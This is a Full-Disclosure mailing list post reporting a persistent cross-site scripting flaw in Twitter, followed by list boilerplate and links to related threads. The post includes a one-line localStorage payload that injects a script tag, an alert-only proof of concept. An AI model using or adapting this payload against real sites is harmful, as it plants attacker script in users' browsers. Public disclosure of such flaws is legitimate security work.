[Full-disclosure] A persistent xss on twitter,another xss rootkit
Hi
someone report a persistent xss about twitter on wooyun
http://www.wooyun.org/bugs/wooyun-2010-03075
just put on some magic code like this
localStorage.setItem(":USER:",'{"54lvwei":{"value":{"store":{"recentFollowers":{"value":"hellolvwei<script>alert(/aaaaaa/)</script>"}}}}}');
:)
_______________________________________________
Full-Disclosure - We believe in it.
Charter:
http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia -
http://secunia.com/
Relevant Pages
- [Full-disclosure] A oracle injection on CNN
... Someone report this on wooyun ... Full-Disclosure - We believe in it. ... Charter: http://lists.grok.org.uk/full-disclosure-charter.html ... Hosted and sponsored by Secunia - http://secunia.com/ ...
(Full-Disclosure) - [Full-disclosure] Oracle Inc attacked by oracke weak pass
... As you see,someone report this on WooYun ... Full-Disclosure - We believe in it. ... Charter: http://lists.grok.org.uk/full-disclosure-charter.html ... Hosted and sponsored by Secunia - http://secunia.com/ ...
(Full-Disclosure) - Re: [Full-disclosure] List of Fuzzers
... int authenticate(char* username, char* password) { ... that fuzzing has its limitations (that can be fixed and applied like ... Full-Disclosure - We believe in it. ... Charter: http://lists.grok.org.uk/full-disclosure- ...
(Full-Disclosure) - Re: [Full-disclosure] VPN provider helped track down alleged LulzSec member
... if the vpn provider had not shat themself, then it would be a non story. ... Full-Disclosure - We believe in it. ... Charter: http://lists.grok.org.uk/full-disclosure-charter.html ... Hosted and sponsored by Secunia - http://secunia.com/ ...
(Full-Disclosure) - Re: [Full-disclosure] List of Fuzzers
... valid to use someone else's fuzzing framework against one's own ... I see "Which fuzzer on this list will help me find the most ... Full-Disclosure - We believe in it. ... Charter: http://lists.grok.org.uk/full-disclosure- ...
(Full-Disclosure) |
|
